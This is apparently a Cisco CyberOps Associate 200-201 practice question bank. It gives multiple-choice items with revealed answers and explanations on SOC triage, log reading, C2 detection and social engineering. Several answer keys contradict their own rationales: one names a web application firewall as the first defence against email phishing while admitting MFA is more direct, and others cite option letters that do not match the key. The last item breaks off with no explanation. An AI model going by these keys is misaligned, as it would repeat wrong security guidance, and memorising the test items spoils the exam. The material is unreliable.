Cisco CyberOps Associate 200-201 (200-201) — Questions 175

507 questions total · 7pages · All types, answers revealed

Page 1 of 7

Page 2
1
MCQhard

During a security audit, an analyst finds that a third-party vendor has access to sensitive customer data beyond what is necessary for their services. Which principle of least privilege should the policy enforce?

A.Implement an incident response plan for data leaks
B.Update the end-user license agreement
C.Enforce a data classification and access control policy
D.Invoke a service-level agreement
AnswerC

This policy limits vendor access to only necessary data.

Why this answer

The principle of least privilege means granting only the minimum rights needed. The policy should enforce a data classification and access control policy that restricts vendor access to only required data sets. Option C is correct.

Option A (end-user license agreement) is between vendor and customer. Option B (SLA) defines service levels. Option D (incident response) is after-the-fact.

2
MCQeasy

A small business uses a cloud-based email service. The IT administrator wants to protect against phishing attacks that target employees. Which security control should be implemented first?

A.Conduct weekly security awareness training
B.Install antivirus software on all endpoints
C.Deploy a web application firewall (WAF)
D.Enable multi-factor authentication (MFA) on email accounts
AnswerC

WAF is not directly applicable to email; it protects web applications. MFA is a more direct control against phishing.

Why this answer

A Web Application Firewall (WAF) is the correct first control because it can inspect and filter HTTP/HTTPS traffic to the cloud-based email service, blocking malicious links, scripts, and known phishing payloads before they reach users. Since phishing attacks often rely on deceptive URLs and web-based content, a WAF provides a proactive, network-layer defense that reduces the attack surface immediately, without requiring user behavior changes or endpoint configuration.

Exam trap

Cisco often tests the concept that phishing is primarily a web-based attack vector, so candidates mistakenly choose user training (A) or MFA (D) as the first control, overlooking that a WAF provides immediate, automated filtering of malicious web content at the network perimeter.

How to eliminate wrong answers

Option A is wrong because weekly security awareness training, while valuable, is a reactive, human-centric control that relies on employee vigilance and does not block the initial phishing attempt; it should complement technical controls, not be the first line of defense. Option B is wrong because antivirus software on endpoints primarily detects and removes malware after delivery, but phishing attacks often bypass traditional signature-based AV by using social engineering or zero-day exploits, and it does not inspect the email service's web traffic. Option D is wrong because multi-factor authentication (MFA) protects against credential theft after a user is tricked, but it does not prevent the phishing email from reaching the inbox or block malicious links; it is a critical secondary control but not the first layer of defense against the attack vector itself.

3
MCQmedium

A company's security policy requires that all servers have host-based intrusion detection (HIDS) installed and configured to send alerts to the SIEM. During a routine check, you find that a critical database server has HIDS installed but is not sending alerts because the agent service is stopped. The server administrator says he stopped the service because it was using too much CPU. The policy requires that any deviation from baseline must be approved by the security team. What should you do?

A.Restart the service on the server and submit a change request for CPU optimization.
B.Accept the server administrator's justification and document it.
C.Recommend setting the HIDS process priority to low to reduce CPU impact.
D.Report the non-compliance to the security manager and disable the server until compliance is restored.
AnswerA

This restores compliance and initiates the proper process for a permanent fix.

Why this answer

Option A is correct because restarting the service and submitting a change request for CPU optimization addresses the immediate non-compliance while working on a solution. Option B is too lenient; Option C is too harsh; Option D may not solve the CPU issue and bypasses approval.

4
Multi-Selecteasy

Which TWO pieces of information are essential for an analyst to correlate when investigating an intrusion alert from a network-based sensor?

Select 2 answers
A.The color of the network cables
B.Source and destination IP addresses
C.The brand of the sensor
D.Timestamp of the alert
E.The name of the security team lead
AnswersB, D

IP addresses identify the communicating hosts.

Why this answer

Source and destination IP addresses are essential because they allow the analyst to identify the communicating endpoints involved in the intrusion attempt. By correlating these addresses with other alert data, the analyst can determine the origin of the attack and the targeted asset, which is critical for scoping the incident and initiating containment actions.

Exam trap

Cisco often tests the distinction between operational data (IP addresses, timestamps) and irrelevant administrative or physical details, trapping candidates who confuse 'essential for correlation' with 'nice to have' or 'commonly known' information.

5
Multi-Selecteasy

Which TWO of the following are best practices for configuring syslog in a secure monitoring environment? (Choose two.)

Select 2 answers
A.Use UDP as the transport protocol to ensure reliable delivery
B.Set log files to overwrite daily
C.Configure a maximum log file size to prevent disk exhaustion
D.Change the default syslog port to avoid detection by attackers
E.Send syslog messages to a centralized log server over a dedicated management network
AnswersC, E

Limiting log size prevents denial of service due to full disk.

Why this answer

Configuring a maximum log file size prevents syslog messages from filling up the disk, which could cause the system to crash or become unresponsive. This is a critical best practice in secure monitoring to ensure logging continues without exhausting storage resources.

Exam trap

Cisco often tests the misconception that changing default ports or using UDP provides security, when in fact these practices do not address real threats like interception or data loss.

6
MCQhard

You are a senior analyst in a SOC that monitors a large financial institution. The SIEM correlates events from firewalls, IDS, endpoints, and database servers. Over the past week, you have noticed multiple low-priority alerts from the IDS indicating 'ET SCAN NMAP -sS' scans from internal IP 10.0.0.50, which is a print server. The alerts occur at random times during business hours. The number of alerts has increased from 5 per day to 20 per day. The print server runs a standard OS and printer management software. No other alerts are triggered from that host. The firewall logs show outbound connections from the print server to IPs on the internet on port 443, which is abnormal for a print server. You check the printer management software and see no recent updates. The user of the print server, the IT administrator, reports no issues. What is your best course of action?

A.Increase the alert threshold to reduce noise and continue monitoring
B.Disable the printer service on the server and monitor for recurrence
C.Dismiss the alerts as false positives because print servers often perform network discovery
D.Isolate the print server from the network and conduct a forensic investigation
AnswerD

Isolation prevents further malicious activity, and forensic analysis can confirm compromise and identify the attack vector.

Why this answer

The print server at 10.0.0.50 is exhibiting multiple indicators of compromise: it is performing NMAP SYN scans (ET SCAN NMAP -sS) from an internal IP, and firewall logs show abnormal outbound HTTPS connections to internet IPs on port 443. These behaviors are inconsistent with a standard print server's role and suggest the host may be compromised, possibly acting as a pivot point for reconnaissance or command-and-control communication. Isolating the host and conducting a forensic investigation is the appropriate incident response step to contain the threat and determine the root cause before it can cause further damage.

Exam trap

Cisco often tests the candidate's ability to recognize that a combination of seemingly low-severity alerts (NMAP scans) and abnormal outbound traffic on a non-web server indicates a compromise, rather than dismissing them as false positives or tuning them out.

How to eliminate wrong answers

Option A is wrong because increasing the alert threshold would ignore potentially malicious activity, allowing a compromised host to continue scanning and exfiltrating data. Option B is wrong because disabling the printer service does not address the underlying compromise; the attacker could still use other services or persistence mechanisms on the server. Option C is wrong because print servers do not normally perform NMAP SYN scans or make outbound HTTPS connections to arbitrary internet IPs; dismissing these as false positives ignores clear signs of anomalous behavior.

7
MCQeasy

An analyst is examining a syslog message from a Cisco ASA showing: %ASA-4-106023: Deny udp src outside:192.0.2.1/123 dst inside:10.0.0.5/123. Which type of traffic is being denied?

A.HTTP traffic
B.SNMP traffic
C.NTP traffic
D.DNS traffic
AnswerC

NTP uses UDP port 123.

Why this answer

The syslog message %ASA-4-106023 shows a UDP deny from source 192.0.2.1 port 123 to destination 10.0.0.5 port 123. Port 123 is the well-known port for Network Time Protocol (NTP), which is used for clock synchronization. Therefore, the denied traffic is NTP traffic.

Exam trap

The trap here is that candidates may confuse port 123 with other common UDP services like DNS (port 53) or SNMP (ports 161/162), or assume the '123' is a random number rather than a standard port assignment.

How to eliminate wrong answers

Option A is wrong because HTTP traffic uses TCP port 80 or 8080, not UDP port 123. Option B is wrong because SNMP traffic uses UDP ports 161 (queries) and 162 (traps), not port 123. Option D is wrong because DNS traffic uses UDP port 53 (or TCP for zone transfers), not port 123.

8
Multi-Selecthard

Which TWO of the following are valid reasons to use a proxy server for security monitoring? (Choose two.)

Select 2 answers
A.To reduce network latency for monitored traffic
B.To provide a complete log of all network traffic for forensics
C.To inspect encrypted traffic by acting as a man-in-the-middle with SSL decryption
D.To enforce outbound access policies and block connections to known malicious destinations
E.To replace the need for endpoint anti-malware software
AnswersC, D

SSL decryption allows the proxy to see inside HTTPS traffic for malicious content.

Why this answer

Options A and C are correct. A proxy can decrypt SSL traffic for inspection (with proper consent) and filter outbound traffic to block malware C2. Option B is incorrect because proxies generally increase latency.

Option D is incorrect because anti-malware scanning is typically done on endpoints or at the gateway, not solely as a proxy function. Option E is incorrect because while proxies can log, they are not the only tool; specialized monitoring tools may be more effective.

9
MCQeasy

Which Windows registry hive contains user-specific configuration settings that can be modified by applications?

A.HKEY_CLASSES_ROOT
B.HKEY_LOCAL_MACHINE
C.HKEY_CURRENT_USER
D.HKEY_USERS
AnswerC

HKCU stores per-user configuration.

Why this answer

HKEY_CURRENT_USER (HKCU) is the correct answer because it stores user-specific configuration settings, such as desktop preferences, environment variables, and application settings, that are loaded from the NTUSER.DAT file when a user logs in. Applications modify this hive to persist per-user customizations, making it the primary location for user-level registry changes.

Exam trap

The trap here is that candidates confuse HKEY_CURRENT_USER with HKEY_LOCAL_MACHINE, assuming all configuration settings are system-wide, but Cisco tests the distinction that per-user application settings are stored in HKCU, not HKLM.

How to eliminate wrong answers

Option A is wrong because HKEY_CLASSES_ROOT (HKCR) stores file association and COM class registration data, not user-specific application settings. Option B is wrong because HKEY_LOCAL_MACHINE (HKLM) contains system-wide configuration settings that apply to all users and require administrative privileges to modify, not per-user settings. Option D is wrong because HKEY_USERS (HKU) contains all loaded user hives on the system, but applications typically write to the current user's hive via HKCU, which is a symbolic link to the specific user's subkey under HKU; direct modification of HKU is uncommon for application settings.

10
MCQhard

A security auditor reviews the SNMP configuration. Which security concern should be reported?

A.The location and contact information is exposed
B.SNMP is disabled on the router
C.The community strings are set to default values
D.The private community string is read-only
AnswerC

Default community strings are easily guessed.

Why this answer

Option C is correct because default SNMP community strings (e.g., 'public' for read-only, 'private' for read-write) are well-known and widely documented. An attacker who discovers these defaults can query or modify the device's MIB, leading to information disclosure or unauthorized configuration changes. This is a critical security concern that must be reported.

Exam trap

Cisco often tests the distinction between the existence of a default community string (a critical vulnerability) versus the access level (read-only vs. read-write) or the exposure of non-sensitive MIB objects like sysLocation.

How to eliminate wrong answers

Option A is wrong because exposing location and contact information is a low-severity information disclosure issue, not the primary security concern when default community strings are in use. Option B is wrong because disabling SNMP is actually a security best practice, not a security concern. Option D is wrong because a read-only private community string is actually more secure than a read-write one; the problem is that the string itself is set to a default value, not its access level.

11
Multi-Selecthard

Which TWO network behaviors suggest an ARP spoofing attack is occurring? (Choose two.)

Select 2 answers
A.A high number of TCP RST packets
B.A single host sending numerous ARP requests
C.Packets originating from a MAC address that does not match the IP's legitimate MAC
D.An increase in broadcast ARP traffic
E.Multiple IP addresses mapping to the same MAC address
AnswersC, E

Indicates the attacker is sending packets with a spoofed MAC.

Why this answer

Option C is correct because in an ARP spoofing attack, the attacker sends forged ARP replies that associate their own MAC address with the IP address of a legitimate host (e.g., the default gateway). This causes packets destined for that IP to be sent to the attacker's MAC, creating a mismatch between the source MAC in the packet and the legitimate MAC address for that IP. Detecting such mismatches is a key indicator of ARP cache poisoning.

Exam trap

Cisco often tests the distinction between normal ARP traffic (e.g., broadcasts for resolution) and malicious ARP behavior (e.g., multiple IPs on one MAC or MAC-IP mismatches), so candidates mistakenly choose high ARP volume or TCP RSTs as spoofing indicators.

12
MCQhard

You are a SOC analyst at a mid-sized company. The company uses a SIEM that ingests logs from firewalls, IDS, and endpoints. Over the past week, you've noticed a gradual increase in outbound traffic from several internal hosts to IP addresses in a foreign country during non-business hours. The traffic is primarily on port 443. The IDS has not generated any alerts. The firewall logs show the connections are established. You check the endpoints and find no unusual processes running. However, the outbound connections persist. What is the most likely explanation and the best next step?

A.Enable SSL decryption on the firewall to inspect the traffic content.
B.Assume the hosts are compromised and reimage them.
C.Ignore the traffic since the IDS and endpoints show no signs of compromise.
D.Immediately isolate all affected hosts from the network.
AnswerA

Provides visibility into encrypted traffic to confirm data exfiltration.

Why this answer

The gradual increase in outbound traffic on port 443 (HTTPS) to foreign IPs during non-business hours, without IDS alerts or suspicious processes, strongly suggests data exfiltration over encrypted channels. Since the traffic is encrypted, the IDS cannot inspect the payload, and endpoint checks may miss stealthy malware that uses legitimate processes (e.g., svchost.exe) for beaconing. Enabling SSL decryption on the firewall allows the SOC to decrypt and inspect the HTTPS traffic, revealing the actual content and confirming or ruling out exfiltration.

Exam trap

Cisco often tests the misconception that a lack of IDS alerts and endpoint anomalies means the network is clean, but the trap here is that encrypted traffic (port 443) can hide malicious activity from signature-based detection, requiring proactive decryption to uncover the threat.

How to eliminate wrong answers

Option B is wrong because reimaging hosts without first confirming compromise is premature and disruptive; the traffic could be legitimate (e.g., cloud backups) and reimaging would destroy forensic evidence. Option C is wrong because ignoring traffic solely because IDS and endpoints show no signs of compromise is a dangerous assumption—encrypted traffic can bypass IDS signatures, and malware can hide from endpoint scans (e.g., fileless or living-off-the-land techniques). Option D is wrong because immediately isolating all affected hosts is an overreaction without evidence of compromise; it would disrupt business operations and may not be necessary if the traffic is benign, and it prevents further investigation.

13
MCQeasy

You are a security analyst at a medium-sized company. The company uses a SIEM that collects logs from firewalls, IDS/IPS, and endpoint detection and response (EDR) agents. You receive an alert that a user's workstation (IP 10.0.1.25) has been making outbound connections to an IP address (198.51.100.10) on port 4444 (commonly used by malware). The alert includes a SIEM correlation rule that triggered when three or more connections to that IP occurred within 5 minutes. You check the EDR logs and see that the workstation is running a process named 'svchost.exe' that is connecting to that IP. The process path is C:\Windows\system32\svchost.exe, which is legitimate. However, you notice that the process has a digital signature from 'Microsoft Corporation', but the signature date is from 2021. The workstation's operating system is Windows 10 22H2, fully patched as of last month. The user reports that they have been experiencing slow performance and occasional pop-ups. Which action should you take FIRST to investigate this potential compromise?

A.Perform a full system reimage of the workstation to ensure the malware is removed.
B.Use the EDR to list all DLLs loaded by svchost.exe and look for any suspicious DLLs that are not from Microsoft.
C.Immediately block the outbound connection to 198.51.100.10 at the firewall and isolate the workstation from the network.
D.Verify the digital signature of svchost.exe with Microsoft to ensure it has not been revoked.
AnswerB

This can detect DLL sideloading or injection, which is a common technique.

Why this answer

Option B is correct because the presence of a legitimate svchost.exe with a valid Microsoft signature does not rule out DLL sideloading or injection. By listing all DLLs loaded by the process, you can identify suspicious non-Microsoft DLLs that may be executing malicious code within the trusted svchost.exe context, which is a common technique used by malware to evade detection.

Exam trap

Cisco often tests the misconception that a valid digital signature on a process executable guarantees the process is clean, when in reality attackers frequently use signed Microsoft binaries as hosts for malicious code via injection or sideloading.

How to eliminate wrong answers

Option A is wrong because performing a full system reimage is a drastic, irreversible step that destroys forensic evidence and should only be taken after confirming compromise and preserving data. Option C is wrong because immediately blocking the connection and isolating the workstation may disrupt the investigation and alert the attacker; the first step should be to gather more evidence via EDR before taking containment actions. Option D is wrong because verifying the digital signature of svchost.exe is unnecessary—the signature is already valid and from Microsoft, but malware can still abuse a legitimate signed binary through DLL hijacking or process hollowing.

14
Drag & Dropmedium

Drag and drop the steps to configure a VLAN on a Cisco switch into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

VLAN creation: global config, create VLAN, name it, then assign ports.

15
MCQhard

Based on the exhibit, what does the sequence of events indicate?

A.The wmiprvse.exe process is known to spawn svchost.exe for system health checks.
B.A process masquerading as svchost.exe was spawned by wmiprvse.exe (likely via WMI), and then that malicious process launched calc.exe, a suspicious behavior.
C.The user is executing a macro that opens Calculator.
D.A legitimate system process (wmiprvse.exe) launched a service host, which then launched calc.exe for maintenance.
AnswerB

The path and subsequent execution of calc.exe indicate malicious activity.

Why this answer

The exhibit shows wmiprvse.exe (the WMI Provider Host) spawning svchost.exe, which then launches calc.exe. In normal operations, wmiprvse.exe does not spawn svchost.exe; svchost.exe is a generic host process for Windows services and is typically launched by services.exe. The sequence indicates process masquerading: an attacker used WMI to execute a malicious binary named svchost.exe, which then launched calc.exe as a suspicious payload.

This is a classic indicator of lateral movement or privilege escalation via WMI.

Exam trap

Cisco often tests the misconception that svchost.exe is always legitimate and that wmiprvse.exe only spawns itself or system processes, when in fact attackers can use WMI to launch arbitrary executables with a misleading name.

How to eliminate wrong answers

Option A is wrong because wmiprvse.exe does not spawn svchost.exe for system health checks; svchost.exe is started by services.exe, and WMI does not initiate such a process for health monitoring. Option C is wrong because the exhibit shows a process chain (wmiprvse.exe → svchost.exe → calc.exe), not a user directly executing a macro; macros typically run within an Office application, not via WMI and svchost.exe. Option D is wrong because a legitimate system process (wmiprvse.exe) does not launch svchost.exe for maintenance; svchost.exe is a service host, not a maintenance tool, and calc.exe is not a standard maintenance binary.

16
MCQhard

A Cisco Firepower appliance generates an intrusion specific event with the message 'MALWARE-CNC generic command and control traffic detected'. The analyst needs to determine if the alert is a true positive. Which additional data source would provide the most corroborating evidence?

A.Application control logs
B.URL filtering logs
C.NetFlow records
D.DNS query logs
AnswerD

DNS logs can confirm if the destination is a known CnC domain.

Why this answer

DNS query logs are the most corroborating evidence because malware command-and-control (C2) traffic often relies on DNS to resolve the IP address of the C2 server. A sudden spike in NXDOMAIN responses, queries to algorithmically generated domains (DGA), or requests to known malicious domains in the DNS logs would directly confirm the C2 activity. This aligns with the 'MALWARE-CNC' signature, which specifically targets C2 communication patterns.

Exam trap

Cisco often tests the misconception that NetFlow or URL filtering logs are sufficient for C2 detection, but the key is that DNS logs reveal the domain resolution step that is almost always part of C2 communication, making them the most direct corroborating source.

How to eliminate wrong answers

Option A is wrong because application control logs identify which applications (e.g., HTTP, FTP) are in use but do not reveal the destination domain or IP of C2 traffic, making them insufficient for corroborating C2-specific alerts. Option B is wrong because URL filtering logs show only HTTP/HTTPS requests with full URLs, but C2 traffic often uses non-standard ports or protocols (e.g., DNS tunneling, IRC) that bypass URL filtering entirely. Option C is wrong because NetFlow records provide IP addresses, ports, and byte counts but lack the domain name resolution data needed to confirm C2 domain lookups; they cannot distinguish between a legitimate DNS query and a DGA-based query without additional context.

17
MCQmedium

A help desk receives a phone call from someone claiming to be from IT and requesting a password reset. What type of attack is this?

A.Social engineering
B.Phishing
C.Malware
D.Vishing
AnswerD

Vishing is voice phishing conducted over phone calls.

Why this answer

Vishing (voice phishing) is a social engineering attack conducted over voice communication, such as a phone call, where the attacker impersonates a legitimate entity (e.g., IT support) to trick the victim into revealing sensitive information or performing an action like a password reset. This matches the scenario exactly: a phone call from someone claiming to be from IT requesting a password reset.

Exam trap

Cisco often tests the distinction between the general category (social engineering) and the specific attack vector (vishing, phishing, smishing), so the trap here is that candidates see 'social engineering' and select it without recognizing that the question asks for the specific type of attack based on the communication method (phone call).

How to eliminate wrong answers

Option A is wrong because social engineering is the broader category of psychological manipulation, not the specific attack vector (phone call) described; the question asks for the type of attack, not the general technique. Option B is wrong because phishing typically involves electronic communication like email or fraudulent websites, not a direct voice call. Option C is wrong because malware refers to malicious software (e.g., viruses, worms, trojans) and does not involve direct human interaction via a phone call.

18
MCQhard

A SOC analyst is tuning an IPS rule that detects SQL injection attempts. The rule currently generates a high number of alerts, most of which are false positives caused by legitimate web application traffic containing SQL-like keywords. The analyst wants to reduce false positives without missing actual attacks. Which approach is most effective?

A.Implement a whitelist of known good SQL queries from the application.
B.Reduce the rule's sensitivity to only match exact attack patterns.
C.Disable the rule and rely on web application firewall logs.
D.Exclude all HTTP GET requests from inspection.
AnswerA

Whitelisting legitimate queries reduces false positives while keeping detection for other traffic.

Why this answer

Option A is correct because implementing a whitelist of known good SQL queries from the application allows the IPS to ignore benign traffic that matches SQL-like patterns, reducing false positives while still alerting on any SQL injection attempt that deviates from the whitelist. This approach leverages application-specific knowledge to distinguish legitimate queries from malicious ones, maintaining detection coverage for actual attacks.

Exam trap

The trap here is that candidates may think reducing sensitivity (Option B) is the best way to reduce false positives, but Cisco tests the understanding that whitelisting is a more precise method that preserves detection of varied attack patterns while eliminating noise from known benign traffic.

How to eliminate wrong answers

Option B is wrong because reducing the rule's sensitivity to only match exact attack patterns would likely cause the IPS to miss polymorphic or obfuscated SQL injection attempts that do not exactly match the predefined patterns, increasing false negatives. Option C is wrong because disabling the IPS rule and relying solely on web application firewall (WAF) logs removes the network-layer detection capability of the IPS, creating a security gap where SQL injection traffic that bypasses the WAF (e.g., due to misconfiguration or encoding differences) would go undetected. Option D is wrong because excluding all HTTP GET requests from inspection would allow SQL injection attacks delivered via GET parameters (a common vector) to pass through without any alerting, completely undermining the rule's purpose.

19
MCQeasy

A security analyst observes a high volume of ICMP echo replies from multiple internal hosts to a single external IP address. Which type of network activity is most likely indicated?

A.Ping sweep
B.ARP spoofing
C.Port scan
D.Smurf attack
AnswerA

Ping sweep sends ICMP echo requests to multiple hosts to discover live hosts.

Why this answer

A ping sweep uses ICMP echo requests to discover live hosts; the observed high volume of ICMP echo replies from multiple internal hosts to a single external IP indicates that the external IP sent a flood of echo requests, and the internal hosts are responding. This is the classic signature of a ping sweep (or ICMP sweep) where an attacker probes a range of internal addresses to map the network.

Exam trap

Cisco often tests the distinction between a Smurf attack and a ping sweep by emphasizing that in a Smurf attack the replies are directed to a spoofed victim IP (often internal), whereas here the replies go to a single external IP, making it a sweep.

How to eliminate wrong answers

Option B is wrong because ARP spoofing involves sending forged ARP replies to associate the attacker's MAC address with the IP of a legitimate host, which does not generate ICMP echo replies from multiple hosts to a single external IP. Option C is wrong because a port scan typically uses TCP SYN, UDP, or other transport-layer probes to discover open ports, not ICMP echo replies. Option D is wrong because a Smurf attack uses ICMP echo requests with a spoofed source IP (the victim) sent to a broadcast address, causing all hosts on the network to reply to the victim; here, replies are going to a single external IP, not a victim inside the network, and the traffic is replies, not requests.

20
MCQeasy

Refer to the exhibit. What does this syslog message indicate?

A.Failed telnet attempt
B.Denied SSH connection attempt
C.Successful SSH connection
D.Allowed TCP traffic
AnswerB

The destination port 22 (SSH) was denied.

Why this answer

The syslog message '%SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: admin] [Source: 10.1.1.1] [localport: 22]' indicates a failed login attempt on port 22, which is the default port for SSH. Since the message explicitly shows 'localport: 22' and the login failed, it corresponds to a denied SSH connection attempt, not a successful one or a Telnet attempt (which uses port 23).

Exam trap

The trap here is that candidates may confuse the 'Login failed' message with a generic 'denied' message, but Cisco specifically tests the ability to identify the protocol by the port number (22 for SSH vs. 23 for Telnet) in the syslog output.

How to eliminate wrong answers

Option A is wrong because the syslog message shows 'localport: 22', which is the default port for SSH, not Telnet (port 23); a failed Telnet attempt would reference port 23. Option C is wrong because the message explicitly states 'Login failed', indicating the connection was denied, not successful. Option D is wrong because the message indicates a failed login, not allowed TCP traffic; allowed traffic would generate a different syslog message (e.g., 'LOGIN_SUCCESS' or an ACL permit log).

21
MCQeasy

Refer to the exhibit. What type of activity does this log represent?

A.Man-in-the-middle attack.
B.Denial-of-service (DoS) attack.
C.Brute force SSH attack.
D.Port scan.
AnswerC

Repeated connections to port 22 from one source suggest SSH brute-force.

Why this answer

The log shows repeated SSH connection attempts with 'Failed password' messages from the same source IP (10.10.0.5) to the same destination IP (10.10.0.3) for user 'admin'. This pattern of multiple failed authentication attempts in a short time window is characteristic of a brute force SSH attack, where an attacker systematically tries different passwords to gain unauthorized access.

Exam trap

Cisco often tests the distinction between a brute force attack (repeated authentication attempts) and a port scan (probing multiple ports), so the trap here is that candidates see multiple connection attempts and mistakenly think it is a port scan rather than recognizing the SSH-specific 'Failed password' messages.

How to eliminate wrong answers

Option A is wrong because a man-in-the-middle attack would involve intercepting or altering communications between two parties, not repeated failed login attempts. Option B is wrong because a denial-of-service attack aims to overwhelm a service with traffic to make it unavailable, whereas this log shows targeted authentication failures without evidence of resource exhaustion. Option D is wrong because a port scan typically involves sending packets to multiple ports to discover open services, not repeated login attempts to a single service (SSH on port 22).

22
MCQeasy

Which command-line tool is used to capture and analyze network packets in real time?

A.Wireshark
B.tcpdump
C.Nmap
D.Nessus
AnswerB

Correct. tcpdump is a command-line packet capture utility.

Why this answer

tcpdump is a command-line packet analyzer that captures and displays network packets in real time directly from the terminal. It uses libpcap to intercept raw packets at the network interface, making it ideal for scripting and remote session analysis where a GUI is unavailable.

Exam trap

Cisco often tests the distinction between command-line and GUI tools, trapping candidates who know Wireshark is a packet analyzer but forget the question explicitly asks for a command-line tool.

How to eliminate wrong answers

Option A is wrong because Wireshark is a GUI-based packet analyzer, not a command-line tool; it uses the same underlying capture engine as tcpdump but requires a graphical environment. Option C is wrong because Nmap is a network discovery and security scanning tool that sends probes to map hosts and services, not a real-time packet capture and analysis tool. Option D is wrong because Nessus is a vulnerability scanner that assesses systems for known weaknesses, not a tool for capturing or analyzing live network packets.

23
MCQhard

A security analyst observes a sudden spike in outbound traffic from a critical server to an external IP address on TCP port 443. The server is a web application server that normally only receives inbound connections. Which type of intrusion is most likely occurring?

A.Distributed denial-of-service (DDoS) attack from the server
B.Brute-force attack on the server's SSH service
C.SQL injection attack against the server
D.Command-and-control (C2) communication from malware on the server
AnswerD

Malware often uses HTTPS outbound to establish C2 while evading detection.

Why this answer

A sudden spike in outbound traffic from a server that normally only receives inbound connections is a classic indicator of command-and-control (C2) communication. Malware on the server often establishes outbound HTTPS (TCP 443) connections to a C2 server to exfiltrate data or receive instructions, bypassing firewalls that typically allow outbound web traffic.

Exam trap

Cisco often tests the distinction between inbound attack types (like SQL injection or brute-force) and outbound indicators of compromise (like C2 traffic), leading candidates to confuse the direction of the traffic with the attack vector.

How to eliminate wrong answers

Option A is wrong because a DDoS attack from the server would involve sending a high volume of traffic to a target, but the question describes a spike to a single external IP, not a distributed flood, and the server is not typically used as an attack source. Option B is wrong because a brute-force attack on SSH would target TCP port 22, not 443, and would generate inbound traffic, not outbound spikes. Option C is wrong because an SQL injection attack is an inbound web application attack that manipulates database queries, not a cause of outbound traffic spikes to an external IP on port 443.

24
MCQeasy

An analyst is monitoring network traffic and notices a host sending ICMP echo requests to multiple hosts in the same subnet with a pattern of incrementing TTL values. What is the most likely purpose of this activity?

A.DNS resolution attempt.
B.Ping sweep to identify active hosts.
C.Denial of service attack against a specific host.
D.Traceroute to map the network topology.
AnswerD

Incrementing TTL is typical of traceroute.

Why this answer

The pattern of incrementing TTL values in ICMP echo requests is the hallmark of a traceroute operation. Traceroute works by sending packets with TTL=1, then TTL=2, etc., so each successive router along the path decrements the TTL to 0 and sends back an ICMP Time Exceeded message, revealing the hop-by-hop path. The target host responds with an ICMP Echo Reply when the TTL is high enough to reach it, confirming the final hop.

Exam trap

Cisco often tests the distinction between a ping sweep (fixed TTL, multiple destinations) and a traceroute (incrementing TTL, single destination), so the trap here is confusing the pattern of incrementing TTLs with a simple liveness scan.

How to eliminate wrong answers

Option A is wrong because DNS resolution uses queries to a DNS server (typically UDP port 53), not ICMP echo requests with incrementing TTLs. Option B is wrong because a ping sweep sends ICMP echo requests with a fixed TTL (usually 128 or 64) to multiple hosts to check liveness, not incrementing TTL values. Option C is wrong because a denial of service attack against a specific host would flood that single target with traffic, not send incrementing TTL probes to multiple hosts in the subnet.

25
MCQhard

A security analyst is reviewing host-based logs from a compromised system. The Windows Security Event Log shows multiple Event ID 4625 (failed logon) from a single source IP, but no successful logon. The network team confirms that IP is a known scanning host. What is the most likely explanation for the lack of successful logon events?

A.The brute-force attack did not succeed in gaining access
B.The logon type was interactive, which is not recorded by Event ID 4625
C.The attacker successfully logged in but the logs were deleted by the attacker
D.The attacker used a pass-the-hash technique that bypasses logon events
AnswerA

Failed logons without success indicate the attacker did not compromise the account.

Why this answer

Event ID 4625 specifically records failed logon attempts. The absence of a corresponding Event ID 4624 (successful logon) from the same source IP indicates that none of the authentication attempts succeeded. Since the network team confirms the IP belongs to a known scanning host, the most likely explanation is that the brute-force attack failed to guess valid credentials.

Exam trap

Cisco often tests the misconception that a lack of successful logon events means the logs were tampered with or that certain attack types bypass logging, when in fact the absence of Event ID 4624 alongside multiple 4625 events is the definitive indicator of a failed brute-force attack.

How to eliminate wrong answers

Option B is wrong because Event ID 4625 records all failed logon attempts regardless of logon type, including interactive, network, and remote logon types; the logon type is a field within the event, not a filter for whether the event is generated. Option C is wrong because while an attacker could delete logs after a successful login, the question explicitly states the logs show multiple Event ID 4625 events but no successful logon events; if logs were deleted, the 4625 events would likely also be missing or the deletion would be evident via Event ID 1102 (log clear). Option D is wrong because pass-the-hash attacks still generate Windows Security Event Log entries; a successful pass-the-hash logon would produce Event ID 4624 (successful logon) with Logon Type 3 (network) or 9 (new credentials), not bypass logon event generation.

26
MCQhard

You are a security analyst for a financial institution. Over the past hour, the intrusion detection system has generated multiple alerts for outbound traffic from a single internal host (10.0.0.50) to various external IP addresses on port 443. The alerts indicate that the host is making HTTPS connections to IPs that are associated with known command and control servers. Additionally, the host has been observed making DNS queries for domains that are algorithmically generated (e.g., rgj3k2.example.com, fh7d8s.example.net). The host is a Windows 10 workstation used by an employee in the accounting department. The employee reports that they have not noticed any unusual behavior, but they did click on a link in a phishing email yesterday. The network administrator confirms that the host's firewall rules allow outbound HTTPS traffic. You have access to endpoint logs, network flow data, and packet captures. Which course of action should you take FIRST?

A.Isolate the host from the network to prevent further C2 communication
B.Analyze packet captures to determine the full extent of the compromise
C.Block all outbound HTTPS traffic from the network
D.Reimage the host immediately to remove the malware
AnswerA

Isolation stops active communication and allows for forensic analysis.

Why this answer

Option A is correct because the immediate priority when confirmed C2 communication is detected is to contain the threat by isolating the host from the network. The combination of outbound HTTPS connections to known C2 servers and algorithmically generated domain (AGD) DNS queries strongly indicates active malware infection. Isolating the host (e.g., via network access control or switch port shutdown) stops data exfiltration and further command reception, which is the first step in incident response containment before any analysis or remediation.

Exam trap

Cisco often tests the incident response priority order, and the trap here is that candidates choose analysis (Option B) or remediation (Option D) first, forgetting that containment (Option A) is the immediate required step per NIST SP 800-61 and Cisco's own incident handling framework.

How to eliminate wrong answers

Option B is wrong because analyzing packet captures to determine the full extent of compromise is a secondary step; the first action must be containment to prevent ongoing C2 traffic and lateral movement. Option C is wrong because blocking all outbound HTTPS traffic from the network is an overly broad and disruptive measure that would break legitimate business operations, and it is not a targeted containment action. Option D is wrong because reimaging the host immediately destroys volatile evidence (e.g., memory-resident malware, active network connections) and should only be performed after forensic data collection and containment.

27
MCQhard

Refer to the exhibit. A security analyst reviews this ACL on a firewall between a DMZ (10.0.1.0/24) and internal network (10.0.2.0/24). What is the effect of this ACL?

A.It allows MySQL traffic from internal network to DMZ
B.It allows MySQL traffic from DMZ to internal network and blocks all other traffic
C.It blocks all traffic from DMZ to internal network
D.It allows any traffic from DMZ to internal network
AnswerB

The first line permits MySQL (port 3306), the second denies everything else.

Why this answer

